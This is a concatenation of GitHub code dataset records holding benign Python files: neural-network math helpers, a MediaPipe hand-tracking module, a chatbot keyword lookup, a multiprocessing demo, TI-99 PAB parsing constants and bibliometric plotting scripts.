url","repo_name":"cckuailong/reapoc","sub_path":"2015/CVE-2015-1880/poc/pocsploit/CVE-2015-1880.py","file_name":"CVE-2015-1880.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":641,"dataset":"github-code","pt":"78"}
{"seq_id":"39178754528","text":"import numpy as np\n\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-x))\n\ndef sigmoid_grad(x):\n    return (1.0 - sigmoid(x)) * sigmoid(x)\n\ndef softmax(x):\n    if x.ndim == 2:\n        return softmax_2D(x)\n    else:\n        return softmax_1D(x)\n\ndef softmax_1D(x):\n    c = np.max(x)\n    exp_a = np.exp(x - c) # avoid overflow\n    sum_exp_a = np.sum(exp_a)\n    y = exp_a / sum_exp_a\n\n    return y\n\ndef softmax_2D(x):\n    x = x.T\n    x = x - np.max(x, axis=0)\n    y = np.exp(x) / np.sum(np.exp(x), axis=0)\n    return y.T\n\ndef cross_entropy_error(y, t):\n    if y.ndim == 1:\n        y = y.reshape(1, y.size)\n        t = t.reshape(1, t.size)\n\n    if t.size == y.size:\n        t = t.argmax(axis=1)\n\n    batch_size = y.shape[0]\n    delta = 1e-7\n\n    # for each vector in y, pick out the element at the index of the correct label\n    biggests_in_y = y[np.arange(batch_size), t]\n\n    return -1 * np.sum(np.log(biggests_in_y + delta)) / batch_size","repo_name":"PandaDrunkard/deep-learning-from-scratch","sub_path":"common/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"18775150260","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport time # check framerate\n\nfrom typing import Union\n\n\n'''\nBuilding a module out of everything we learned, so we do not have to repeat alllll this code whenever we use it\nWe will only make simple calls into it\n'''\n\n# Typing =================\n'''\nType Hints can be used by tools such as IDEs and type checkers to provide extra information about the code.\n For example, an IDE can use Type Hints to offer code suggestions and check that you are using the right type of data in a variable.\nType Hints can be used to document the code. This is useful when you work on a project with several people, \n since it lets you specify the type of data a variable should hold.\nType Hints can be used to check that the code is using the correct type of data in a variable. This helps catch \n typos or logic errors that would be hard to find at runtime.\nType Hints can be used to optimize the code at runtime. For example, if you use Type Hints to state that a variable holds an integer, \n the Python interpreter may use a faster implementation of the math operations instead of a generic one that works with any type of data.\n'''\nwebcam_image = np.ndarray\nconfidence = float\ncoords_vector = Union[int, list[int]]\nrgb_tuple = tuple[int, int, int]\n# =========================\n\n\n# Class ===================\nclass VanzeDetector():\n    def __init__(self, \n                 mode: bool = False, \n                 number_hands: int = 2, \n                 model_complexity: int = 1,\n                 min_detec_confidence: confidence = 0.5, \n                 min_tracking_confidence: confidence = 0.5\n                 ):\n        \n        # Parameters needed to initialize hands -> the mediapipe solution\n        self.mode = mode\n        self.max_num_hands = number_hands\n        self.complexity = model_complexity\n        self.detection_con = min_detec_confidence\n        self.tracking_con = min_tracking_confidence\n\n        # Initializing hands\n        self.mp_hands = mp.solutions.hands\n        self.hands = self.mp_hands.Hands(self.mode,\n                                         self.max_num_hands,\n                                         self.complexity,\n                                         self.detection_con,\n                                         self.tracking_con) \n        self.mp_draw = mp.solutions.drawing_utils\n        self.tip_ids = [4, 8, 12, 16, 20]\n\n    def find_hands(self, \n                   img: webcam_image, \n                   draw_hands: bool = True):\n        # Color conversion\n        img_RGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n        # Collecting the results of the hands processing and analyzing them\n        self.results = self.hands.process(img_RGB)\n        if self.results.multi_hand_landmarks:\n            for hand in self.results.multi_hand_landmarks:\n                if draw_hands:\n                    self.mp_draw.draw_landmarks(img, hand, self.mp_hands.HAND_CONNECTIONS) \n\n        return img\n\n    def find_position(self, \n                      img: webcam_image, \n                      hand_number: int = 0, \n                      draw_hands: bool = True):\n        self.required_landmark_list = []\n        \n        if self.results.multi_hand_landmarks:\n            my_hand = self.results.multi_hand_landmarks[hand_number]\n            for id, lm in enumerate(my_hand.landmark):\n                height, width, channels = img.shape\n                center_x, center_y = int(lm.x*width), int(lm.y*height)\n\n                self.required_landmark_list.append([id, center_x, center_y]) \n\n                # if draw_hands:\n                #     # if id==8:\n                #     cv2.circle(img, (center_x, center_y), 10, (255, 0, 0), cv2.FILLED)\n\n        return self.required_landmark_list\n\n    def fingers_up(self):\n        '''\n        For this function we must look at the tip of the finger we want to check, to decide whether it is raised or not\n        To do that, we always compare the fingertip with the landmark two positions below it. For example:\n        If I want to know whether the index finger is up, I compare the y axis of LM 8 and LM 6. If y_8 < y_6 (the image y axis grows downward), the finger is raised,\n        otherwise it is not.\n        The same idea repeats for all the other fingers.\n        '''\n        fingers = []\n\n        # thumb - checked differently because the thumb behaves differently. It does not come down along the y axis like the other fingers do\n        if self.required_landmark_list[self.tip_ids[0]][1] > self.required_landmark_list[self.tip_ids[0] - 1][1]: fingers.append(1)\n        else: fingers.append(0)\n\n        # For the other 4 fingers\n        for id in range(1, 5):\n            if self.required_landmark_list[self.tip_ids[id]][2] < self.required_landmark_list[self.tip_ids[id] - 2][2]: fingers.append(1)\n            else: fingers.append(0)\n\n        return fingers\n\n    def draw_in_position(self,\n                         img: webcam_image,\n                         x_vector: coords_vector, \n                         y_vector: coords_vector,\n                         rgb_selection: rgb_tuple = (255, 0, 0),\n                         thickness: int = 10):\n        x_vector = x_vector if type(x_vector) == list else [x_vector]\n        y_vector = y_vector if type(y_vector) == list else [y_vector]\n\n        for x, y in zip(x_vector, y_vector):\n            cv2.circle(img, (x, y), thickness, rgb_selection, cv2.FILLED)\n\n        return img\n    \n# Main ==================== for testing the class\ndef main():\n    # tracking the framerate and capturing the video\n    previous_time = 0\n    current_time = 0\n    capture = cv2.VideoCapture(0)\n\n    Vanze = VanzeDetector()\n\n    while True:\n        success, img = capture.read()\n        \n        img = Vanze.find_hands(img) #, draw_hands=False)\n        landmark_list = Vanze.find_position(img) #, draw_hands=False)\n        if landmark_list:\n            print(landmark_list[8])\n\n        current_time = time.time()\n        fps = 1/(current_time - previous_time)\n        previous_time = current_time\n\n        cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_DUPLEX, 2, (255,0,255), 3)\n        # cv2.putText(image, text, position, font, fontScale, color, thickness)\n\n        cv2.imshow(\"Image\", img)\n        cv2.waitKey(1)\n\nif __name__ == '__main__':\n    main()\n","repo_name":"RodrigoVanzelotti/hand_tracking_volume_gesture","sub_path":"hand_tracking_module.py","file_name":"hand_tracking_module.py","file_ext":"py","file_size_in_byte":6664,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"4288477989","text":"import csv\n\n# first, we build the keyword dict, which holds common\n# keywords such as info-beasiswa or yang-dibawa-ospek.\n\nkeyword = {}\n\nwith open('datacsv/umum.csv',newline='') as csvfile: # the delimiter is '|', because it is rarely used\n    baris = csv.reader(csvfile,delimiter='|') # if it were ','... 
things could easily break.\n    temp = []\n    for x in baris: # basically, the contents of ultah_csv\n        temp.append(x) \t\t\t\t# are now in the temp variable\n\nkeyword = {temp[i][0]:temp[i][1] for i in range(len(temp))} # turn temp (a list) into keyword (a dict)\n\ndef cek_umum(Input,keyword=keyword):\n    if Input in keyword:\n        return(True) # the Input is in the general-category keywords, i.e. here\n    else:\n        return(False)\ndef keyword_umum(Input, keyword=keyword):\n    return(keyword[Input])\n","repo_name":"Rubiguu/line-bot-fmipa-rubio-experiment","sub_path":"keyword_umum.py","file_name":"keyword_umum.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"29413026880","text":"import time\nimport multiprocessing\n\ndef test1():\n    while True:\n        print(\"1----------------\")\n        time.sleep(1)\n\ndef test2():\n    while True:\n        print(\"2----------------\")\n        time.sleep(1)\n\ndef main():\n    t1 = multiprocessing.Process(target=test1)\n    t2 = multiprocessing.Process(target=test2)\n    t1.start()\n    t2.start()\n\nif __name__ == '__main__':\n    main()","repo_name":"IronmanJay/Python_Project","sub_path":"Multitask/Pocess/UseProcess.py","file_name":"UseProcess.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"}
{"seq_id":"73123814331","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n#\n# PAB routines...\n#\n\nOPEN = 0\nCLOSE = 1\nREAD = 2\nWRITE = 3\nRESTORE = 4\nLOAD = 5\nSAVE = 6\nDELETE = 7\nSCRATCH = 8\nSTATUS = 9\n\n#\n# Return the TI DSR Opcode\n\n\ndef opcode(pab):\n    return int(pab[0])\n\n\n# Constants for fileType\nSEQUENTIAL = 0x00\nRELATIVE = 0x01\n\n\ndef fileType(pab):\n    return pab[1] & 0x01\n\n\n# Constants for modes\nUPDATE = 0x00\nOUTPUT = 0x01\nINPUT = 0x02\nAPPEND = 0x03\n\n\ndef mode(pab):\n    return (pab[1] & 0x06) >> 1\n\n\n# Data types\nDISPLAY = 0x00\nINTERNAL = 0x01\n\n\ndef dataType(pab):\n    return (pab[1] & 0x08) >> 3\n\n\n# Record types\nFIXED = 0x00\nVARIABLE = 0x01\n\n\ndef recordType(pab):\n    return (pab[1] & 0x10) >> 4\n\n\n# Length of file records\n\n\ndef recordLength(pab):\n    return pab[4]\n\n\n#\n# Return byte count from PAB / or byte count in LOAD/SAVE operations\n\n\ndef recordNumber(pab):\n    return (pab[6] << 8) + pab[7]\n\n\n#\n# pretty pab string\n\n\ndef logPab(pab):\n    opcodes = {\n        0: \"Open\",\n        1: \"Close\",\n        2: \"Read\",\n        3: \"Write\",\n        4: \"Restore\",\n        5: \"Load\",\n        6: \"Save\",\n        7: \"Delete\",\n        8: \"Scratch\",\n        9: \"Status\",\n    }\n    fileTypes = {SEQUENTIAL: \"Sequential\", RELATIVE: \"Relative\"}\n    modes = {UPDATE: \"Update\", OUTPUT: \"Output\", INPUT: \"Input\", APPEND: \"Append\"}\n    dataTypes = {DISPLAY: \"Display\", INTERNAL: \"Internal\"}\n    recordTypes = {FIXED: \"Fixed\", VARIABLE: \"Variable\"}\n    logger.info(\n        \"opcode: %s, fileType: %s, mode: %s, dataType: %s, recordType: %s, recordLength: %d, recordNumber: %d\",\n        opcodes[opcode(pab)],\n        fileTypes[fileType(pab)],\n        modes[mode(pab)],\n        dataTypes[dataType(pab)],\n        recordTypes[recordType(pab)],\n        recordLength(pab),\n        recordNumber(pab),\n    )\n\n\n#\n# Error Codes\nEDVNAME = 0x00\nEWPROT = 0x01\nEOPATTR = 0x02\nEILLOP = 0x03\nENOSPAC = 0x04\nEEOF = 0x05\nEDEVERR = 0x06\nEFILERR = 0x07\n# TIPI Success\nSUCCESS = 0xFF\n\n#\n# Status constants to be OR'ed together\nSTNOFILE = 0x80\nSTPROTECTED = 0x40\nSTRES1 = 0x20\nSTINTERNAL = 0x10\nSTPROGRAM = 0x08\nSTVARIABLE = 0x04\nSTPEOF = 0x02\nSTLEOF = 
0x01\n","repo_name":"jedimatt42/tipi","sub_path":"services/Pab.py","file_name":"Pab.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"78"} +{"seq_id":"18140218727","text":"\"\"\"\nBiblyser (c) is a bibliometric workflow for evaluating the bib metrics of an \nindividual or a group of people (an organisation).\n\nBiblyser is licensed under a MIT License.\n\nYou should have received a copy of the license along with this work. If not, \nsee .\n\"\"\"\n\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom textwrap import wrap\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import StrMethodFormatter\n\n#sys.path.append('../')\nfrom biblyser.bibcollection import getGenderDistrib, countByYear\n\n \n#Import organisation from csv\norg_df = pd.read_csv('output/out_organisation.csv')\n\n#Import bibcollection from csv \ndf = pd.read_csv('output/out_bibs.csv')\n\n#Convert column items to appropriate objects\ndf['org_led'] = df['org_led'].astype('bool')\ndf['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d %H:%M:%S')\ndf['year'] = df['date'].dt.year\n\n#Define bins\nbin10=[0, 1, 10, 20, 30, 40, 50, 60, 70, 80, 90, 99, 100]\nbin25=[0, 1, 25, 50, 75, 99, 100]\n\n#Define bin labels\nl10 = ['0', '1-10', '11-20', '21-30', '31-40', '41-50', '51-60', '61-70', \n '71-80', '81-90', '91-99', '100']\nl25 = ['0%', '1-25%', '26-50%', '51-75%', '76-99%', '100%']\n\n#Set color palettes\ncold = ['#337BA7','#08589e','#2b8cbe','#4eb3d3','#7bccc4','#a8ddb5', '#ccebc5']\nwarm = ['#C85353','#fed976','#feb24c','#fd8d3c','#fc4e2a','#e31a1c','#bd0026']\n\n\n#------------------ Fetch and plot general publication stats ----------------\n\n\n#Get count from first author publications\nfirst = df.loc[df['org_led']==True] \nfirst_yr = countByYear(first)\n\n#Get count from co-author publications\ncoauthor = df.loc[df['org_led']==False] \nco_yr = countByYear(coauthor)\n\n#Merge and rename columns\nco_yr['First author'] = first_yr['count']\nall_yr = co_yr.rename(columns={'count' : 'Co-author'})\n\n#Group journals\njournals = df['journal'].groupby(df['journal']).agg({'count'}).sort_values(by=['count'], \n ascending=True)\nj10 = journals.tail(10)\nothers = len(list(journals['count'][:-10]))\n\n#Affiliations of authorship\naffiliations = list(df['affiliations'])\nout1=[]\nfor a in affiliations:\n allc = a.split(', ')\n [out1.append(a) for a in allc]\nout1 = Counter(out1).most_common()\naff_keys10 = [o[0] for o in out1[1:11]]\naff_vals10 = [o[1] for o in out1[1:11]]\naff_keys10.append('Others')\naff_vals10.append(sum(sorted(list(Counter(out1).values()))[11:]))\n \n#Countries of authorship\ncountries = list(df['countries'])\nout=[]\nfor c in countries:\n allc = c.split(', ')\n [out.append(a) for a in allc]\nout = Counter(out).most_common()\nco_keys10 = [o[0] for o in out[0:10]]\nco_vals10 = [o[1] for o in out[0:10]]\nco_keys10.append('Others')\nco_vals10.append(sum(sorted(list(Counter(out).values()))[10:]))\n\n#Prime subplots\nfig1, ax1 = plt.subplots(1, 1, figsize=(10,10))\nfig1.tight_layout(pad=4, h_pad=8, w_pad=0)\nax2 = ax1.inset_axes([0.2,0.47,0.3,0.2]) #Journals bar plt\nax3 = ax1.inset_axes([0.21,0.75,0.2,0.2]) #Pie #1\nax4 = ax1.inset_axes([0.54,0.75,0.2,0.2]) #Pie #2\n\n#Set font styles and colour palettes\nfontname='Arial'\ntitle = 18\nlfont1 = 14\nlfont2 = 10\nlfont3 = 7 \ntfont = {'fontsize':10, 'color':'#5D5D5D'}\nbar_col = ['#0C7BDC','#FFC20A', 
'#CA4646']\npie_col = ['#332288','#88CCEE','#44AA99','#117733','#999933','#DDCC77',\n '#CC6677','#882255','#AA4499','#6F3866','#DDDDDD']\n\n#Plot year vs. authorships\nall_yr.plot(kind='bar', stacked=False, color=[bar_col[0],bar_col[1]], ax=ax1)\nax1.set(ylim=(0,40), yticks=[0,10,20,30,40], xlabel='Date', \n ylabel='Number of publications')\n\n#Alter plot aesthetics\nax1.tick_params(axis='both', labelsize=tfont['fontsize'], labelcolor=tfont['color'])\nax1.spines['right'].set_visible(False)\nax1.spines['top'].set_visible(False)\nax1.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}')) \n \n#Set annotations\nax1.set_ylabel('Number of publications', labelpad=10, fontsize=lfont1)\nax1.set_xlabel('Date', labelpad=10, fontsize=lfont1)\nax1.legend(loc=4, fontsize=lfont2, framealpha=1,\n title='Publications by year')\n\n#Plot popular journals \nax2.barh([l*2 for l in np.arange(10)], list(j10['count']), color=bar_col[2])\nax2.set_yticks([l*2 for l in np.arange(10)])\nlabels = [ '\\n'.join(wrap(l, 30)) for l in list(j10.index)]\nax2.set_yticklabels(labels, fontsize=lfont3)\nax2.tick_params(axis='x', labelsize=8, labelcolor=tfont['color'])\nax2.spines['right'].set_visible(False)\nax2.spines['top'].set_visible(False)\nax2.text(20, 0.5, f'Number of other journals: {others}', fontsize=lfont3)\n\n#Plot top collaborator affiliations\np3,t3 = ax3.pie(aff_vals10, startangle=90, colors=pie_col, \n wedgeprops={\"edgecolor\":\"w\",'linewidth':1})\nlegend_labels = [ '\\n'.join(wrap(l, 30)) for l in aff_keys10]\nax3.legend(legend_labels, loc='center left', bbox_to_anchor=(-1.0, 0.5), \n fontsize=lfont3)\n\n#Plot top collaborator countries\np4,t4 = ax4.pie(co_vals10, startangle=90, colors=pie_col, \n wedgeprops={\"edgecolor\":\"w\",'linewidth':1})\nlegend_labels = [ '\\n'.join(wrap(l, 15)) for l in co_keys10]\nax4.legend(legend_labels, loc='center left', bbox_to_anchor=(-0.6, 0.5), \n fontsize=lfont3)\n\n#Plot summary table\nax4 = ax1.inset_axes([-0.02,0.38,0.4,0.1])\ncells = [['Total publications', str(len(df.index))], \n ['Organisation-led publications', str(len(first.index))], \n ['Co-authored publications', str(len(coauthor.index))],\n ['Average citation count', str(int(np.nanmean(list(df['citations']))))],\n ['Average altmetrics', str(int(np.nanmean(list(df['altmetric']))))]]\ntable = ax4.table(cellText=cells, colWidths=[0.6,0.2], edges='horizontal',\n cellLoc='left')\nax4.axis(\"off\")\ntable.scale(1, 1.25)\ntable.auto_set_font_size(False)\ntable.set_fontsize(lfont3)\n\n#Set annotations\nplt.title('GEUS publications', fontsize=title)\nax1.text(1, 39.7, 'Top collaborators', fontsize=lfont1)\nax1.text(1, 27.2, 'Top journals', fontsize=lfont1)\nax1.text(1, 15.8, 'Summary statistics', fontsize=lfont1)\n\n#Plot and save\nplt.rcParams[\"font.family\"] = fontname\nplt.savefig('output/publication_stats.jpg', dpi=300)\nplt.show()\n# plt.close()\n\n#------------ Publication lead and co-authorship by gender ----------------\n\n\n#Set font styles \nhfont = {'fontname':'Arial', 'fontsize':16}#, 'fontweight': 'bold'}\nlfont1 = {'fontname':'Arial', 'fontsize':12, 'color':'#5D5D5D'} \ntfont = {'fontname':'Arial', 'fontsize':8, 'color':'#5D5D5D'}\n\n#Get org gender from org papers\ndf1=pd.DataFrame()\nfor index, row in df.iterrows():\n f_led=0\n f_co=0\n m_led=0\n m_co=0\n genders = str(row['org_genders']).split(', ')\n if row['org_led']==True: \n if genders[0]=='female':\n f_led=f_led+1\n else:\n m_led=m_led+1\n genders = genders[1:]\n \n for g in genders:\n if g=='female':\n f_co=f_co+1\n else:\n m_co=m_co+1 \n 
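# per-paper tally: the first gender listed on an org-led paper counts as the lead author, the rest as co-authors\n    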
#Construct pandas series and append to dataframe\n    series = pd.Series({'year': row['date'].year, \n                        'female_lead': f_led,\n                        'male_lead': m_led, \n                        'female_co': f_co,\n                        'male_co': m_co})\n    df1 = pd.concat([df1, series.to_frame().T], ignore_index=True)  # DataFrame.append was removed in pandas 2.0\n\n#Group and sum by year\ndf2 = df1.groupby(['year']).agg({'female_lead':'sum','male_lead':'sum',\n                                 'female_co':'sum','male_co':'sum'}) \nyears = [int(y) for y in list(df2.index)]\nx = list(range(len(years)))\nx = [float(x1)*2 for x1 in x]\nx = np.array(x)\n\n#Prime plotting area\nfig1 = plt.figure(figsize=(10,10))\ngs = gridspec.GridSpec(2, 3, figure=fig1)\nax1 = plt.subplot(gs[:, 0])\ngs.update(hspace=0)\nax2 = plt.subplot(gs[0, 1:])\nax3 = plt.subplot(gs[1, 1:], sharex=ax2)\n\n#Plot as bars \nax1.bar([0,1,3,4], [sum(list(df2['female_lead'])),\n        sum(list(df2['male_lead'])),sum(list(df2['female_co'])),\n        sum(list(df2['male_co']))], width=1, edgecolor='w', \n        color=[cold[2], warm[5], cold[4], warm[3]], align='center') \nax2.bar(x-0.3, list(df2['female_lead']), width=0.6, color=cold[2], \n        align='center', label='Female lead author')\nax2.bar(x+0.3, list(df2['male_lead']), width=0.6, color=warm[5], \n        align='center', label='Male lead author')\nax3.bar(x-0.3, list(df2['female_co']), width=0.6, color=cold[4], \n        align='center', label='Female co-author')\nax3.bar(x+0.3, list(df2['male_co']), width=0.6, color=warm[3], \n        align='center', label='Male co-author')\n\n#Set legends\n[ax.legend(loc=2, fontsize=lfont1['fontsize']) for ax in [ax2, ax3]]\n\n#Set x axes\nax1.set_xticks([0,1,3,4])\nax1.set_xticklabels(['Female\\nlead', 'Male\\nlead', 'Female\\nco', \n                     'Male\\nco'], **tfont)\nax2ytwin = ax2.twiny()\nfor ax in [ax2ytwin, ax3]:\n    ax.set_xlim(0.6,x[-1]+1)\n    ax.set_xticks(x[1:])\n    ax.set_xticklabels(years[1:], rotation=45, **tfont)\n\n#Set y axes\nax1.set_ylim(0,450)\nax1.set_yticks([0,100,200,300,400])\nax1.set_yticklabels(['0','100','200','300','400'], **tfont)\nax2xtwin = ax2.twinx()\nfor ax in [ax2, ax2xtwin]:\n    ax.set_ylim(0,15)\n    ax.set_yticks([0,3,6,9,12,15])\n    ax.set_yticklabels(['0','3','6','9','12',''], **tfont)\nax3xtwin = ax3.twinx()\nfor ax in [ax3, ax3xtwin]:\n    ax.set_ylim(0,50)\n    ax.set_yticks([0,10,20,30,40,50])\n    ax.set_yticklabels(['0','10','20','30','40',''], **tfont)\n\n#Set plot grids \n[ax.set_axisbelow(True) for ax in [ax1,ax2,ax3]]\n[ax.grid(color='gray', linestyle='dashed', axis='y') for ax in [ax1,ax2,ax3]] \n\n#Plot summary table of organisation\nax4 = ax1.inset_axes([0.15,0.943,0.4,0.1])\ncells = [['Total female colleagues', str(list(org_df['guessed_gender']).count('female'))], \n         ['Total male colleagues', str(list(org_df['guessed_gender']).count('male'))], \n         ['Professors', str(list(org_df['title']).count('Forskningsprofessor'))],\n         ['Seniorforsker', str(list(org_df['title']).count('Seniorforsker'))],\n         ['Forsker', str(list(org_df['title']).count('Forsker'))],\n         ['Post-doctoral researchers', str(list(org_df['title']).count('Postdoc'))], \n         ['PhD students', str(list(org_df['title']).count('Ph.d.-studerende'))],\n         ['Other staff', str(list(org_df['title']).count('Chefkonsulent') +\n                             list(org_df['title']).count('Statsgeolog') + \n                             list(org_df['title']).count('AC-medarbejder') + \n                             list(org_df['title']).count('Seniorrådgiver'))]] \ntable = ax4.table(cellText=cells, colWidths=[1.3,0.2], edges='horizontal',\n                  cellLoc='left', alpha=1, zorder=1)\nax4.axis(\"off\")\ntable.scale(1, 1.25)\ntable.auto_set_font_size(False)\ntable.set_fontsize(tfont['fontsize'])\n\n#Set labels and annotations\nax1.text(-0.4, 432, 'Organisation summary', 
fontsize=lfont1['fontsize'])\nax1.set_ylabel('Total publications', **lfont1)\nax2xtwin.set_ylabel('Number of publications (per year)', **lfont1, rotation=270)\nax2xtwin.yaxis.set_label_coords(1.08, 0)\n\n#Plot and save\nplt.rcParams[\"font.family\"] = fontname\nplt.tight_layout()\nplt.savefig('output/publication_genders.jpg', dpi=300) \nplt.show() \n# plt.close() \n\n\n#---------- % female/male authorship in organisation-led papers ------------\n\n\n#Get only organisation-led papers\norg_led = df.loc[df['org_led']==True] \n\n#Compute gender percentages in authorships\nfauthors, mauthors, nbauthors = getGenderDistrib(org_led)\n\n#Calculate bins for pie charts\nfauthors_bin, b1 = np.histogram(fauthors, bin25, range=(bin25[0],bin25[-1])) \nmauthors_bin, b2 = np.histogram(mauthors, bin25, range=(bin25[0],bin25[-1])) \n\n#Prime subplots\nfig1, (ax1, ax3) = plt.subplots(2, 1, figsize=(10,10))\nfig1.tight_layout(pad=4, h_pad=8, w_pad=0)\n\n#Set font styles and colour palettes\nhfont = {'fontname':'Arial', 'fontsize':16}#, 'fontweight': 'bold'}\nlfont1 = {'fontname':'Arial', 'fontsize':14} \nlfont2 = {'fontname':'Arial', 'fontsize':10} \ntfont = {'fontname':'Arial', 'fontsize':12, 'color':'#5D5D5D'}\nafont = {'fontname':'Arial', 'fontsize':8} \n\n\n#Plot histograms\nh1,e1 = np.histogram(fauthors, bins=bin10)\nh2,e2 = np.histogram(mauthors, bins=bin10)\n\nax1.bar(list(range(0, (len(bin10)-1)*10, 10)), h1, width=10, \n color=cold[0], edgecolor='white')\nax3.bar(list(range(0, (len(bin10)-1)*10, 10)), h2, width=10, \n color=warm[0], edgecolor='white')\n\nax1.axvline(sum(fauthors)/len(fauthors), linewidth=2, color=cold[1])\nax3.axvline(sum(mauthors)/len(mauthors), linewidth=2, color=warm[-1])\n\n#Plot pie charts\nax2 = ax1.inset_axes([0.45,0.3,0.65,0.65])\nax4 = ax3.inset_axes([-0.08,0.3,0.65,0.65])\np2,t2,a2 = ax2.pie(fauthors_bin, explode=(0.1, 0, 0, 0, 0, 0), labels=l25, \n colors=cold[1:],textprops=lfont2, autopct='%1.0f%%', \n startangle=90, wedgeprops={\"edgecolor\":\"w\",'linewidth':1},\n pctdistance=0.5, labeldistance=1.05)\np4,t4,a4 = ax4.pie(mauthors_bin, explode=(0, 0, 0, 0, 0.1, 0), labels=l25, \n colors=warm[1:], textprops=lfont2, autopct='%1.0f%%', \n startangle=90, wedgeprops={\"edgecolor\":\"w\",'linewidth':1},\n pctdistance=0.5, labeldistance=1.05)\n\n#Set histogram plot parameters\nfor ax in [ax1,ax3]:\n ax.set_xlim(-5, (len(bin10)-1)*10)\n ax.set_ylim(0,60)\n ax.set_xticks([0,10,20,30,40,50,60,70,80,90,100,110])\n ax.set_xticklabels(l10, tfont)\n ax.set_yticklabels(ax.get_yticks(), tfont)\n ax.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}')) \n ax.set_ylabel('Number of publications', **lfont1)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\nax1.set_xlabel('% female authorship', **lfont1)\nax3.set_xlabel('% male authorship', **lfont1)\n\n#Set pie plot parameters\nfor ax in [ax2,ax4]:\n ax.axis('equal')\nfor a in [a2,a4]:\n [text.set_color('#5D5D5D') for text in a]\n [text.set_fontsize(10) for text in a]\nfor at in [a2[0],a2[1],a2[2],a4[-1],a4[-2],a4[-3]]:\n at.set_color('white')\n\n#Adjust pie chart label position\nx,y = t4[0].get_position()\nt4[0].set_position((x+0.1, y+0.05))\nx,y = t4[1].get_position()\nt4[1].set_position((x, y+0.1))\nx,y = t2[5].get_position()\nt2[5].set_position((x-0.1, y+0.1))\nfor p in [[p2,a2],[p4,a4]]:\n for patch, txt in zip(p[0], p[1]):\n ang = (patch.theta2 + patch.theta1) / 2.\n x = patch.r * 0.7 * np.cos(ang * np.pi / 180)\n y = patch.r * 0.7 * np.sin(ang * np.pi / 180)\n if (patch.theta2 - patch.theta1) < 5.:\n 
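# wedges spanning less than 5 degrees get their percentage label pulled in to the mid-angle point computed above\n            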
txt.set_position((x, y))\n \n#Set plot annotations\nax1.text(sum(fauthors)/len(fauthors)-1.5, 38, 'Average female authorship', \n rotation=90, color=cold[1], **afont)\nax3.text(sum(mauthors)/len(mauthors)-1.5, 39.5, 'Average male authorship', \n rotation=90, color=warm[-1], **afont)\n \n#Set figure titles\nfig1.text(0.5,0.970,'% female authorship in organisation-led papers', \n horizontalalignment='center', verticalalignment='top', **hfont)\nfig1.text(0.5,0.470,'% male authorship in organisation-led papers', \n horizontalalignment='center', verticalalignment='top', **hfont)\n\n#Configure plot boxes\nrect1 = plt.Rectangle((0.02, 0.02), 0.95, 0.97, fill=False, color='#767676', \n lw=1, zorder=1000, transform=fig1.transFigure, \n figure=fig1)\nfig1.patches.extend([rect1])\n\n#Plot and save\nplt.savefig('output/authorship_genders.jpg', dpi=300)\nplt.show()\n# plt.close()\n\n\n#------------ Gender % when 1st/last author is male or female -------------\n\n\n#Set font styles and colour palettes\nhfont = {'fontname':'Arial', 'fontsize':16}#, 'fontweight': 'bold'}\nlfont1 = {'fontname':'Arial', 'fontsize':13} \nlfont2 = {'fontname':'Arial', 'fontsize':13, 'color':'#5D5D5D'} \ntfont = {'fontname':'Arial', 'fontsize':12, 'color':'#5D5D5D'}\n\n#Prime plots\nfig1, ((ax1, ax2), (ax3, ax4), (ax5, ax6), (ax7, ax8)) = plt.subplots(4, 2, \n figsize=(10,10),\n gridspec_kw={'wspace':0, \n 'hspace':0},\n sharex=True,\n sharey=True)\n\n#Iterate through plots\nfor i,ax,t,c1,c2 in zip([['first_gender','female'], ['first_gender','male'],\n ['last_gender','female'], ['last_gender','male']],\n [[ax1,ax2],[ax3,ax4],[ax5,ax6],[ax7,ax8]], \n ['Female lead author', 'Male lead author', \n 'Female last author', 'Male last author'],\n cold[1:6], reversed(warm[1:6])):\n \n #Compute gender percentages from female/male-led authorships\n gens = df.loc[df[i[0]]==i[1]] \n \n #Get gender distribution bins\n fauthors, mauthors, nbauthors = getGenderDistrib(gens, first=False)\n h1,e1 = np.histogram(fauthors, bins=bin10)\n h2,e2 = np.histogram(mauthors, bins=bin10)\n \n #Plot as bar histograms\n ax[0].bar(list(range(0, (len(bin10)-1)*10, 10)), h1, width=10, color=c1, \n edgecolor='white')\n ax[1].bar(list(range(0, (len(bin10)-1)*10, 10)), h2, width=10, color=c2, \n edgecolor='white')\n \n #Twin y axes\n twinax = ax[1].twinx()\n twinax.set_ylim(0,180)\n twinax.set_yticks([0,30,60,90,120,150,180])\n twinax.set_yticklabels(['0', '', '60','', '120', '', ''], tfont) \n \n#Set ticks and grids for all plots\nfor ax in [ax1,ax2,ax3,ax4,ax5,ax6,ax7,ax8]: \n ax.set_axisbelow(True)\n ax.grid(color='gray', linestyle='dashed', axis='y') \n ax.set_xlim(-5, ((len(bin10)-1)*10)-5)\n ax.set_xticks([0,10,20,30,40,50,60,70,80,90,100,110])\n ax.set_xticklabels(l10, tfont, rotation=45)\n ax.set_ylim(0,180)\n ax.set_yticks([0,30,60,90,120,150,180])\n ax.set_yticklabels(['0', '', '60','', '120', '', ''], tfont) \n\n#Set labels\nax7.set_ylabel('Number of publications', 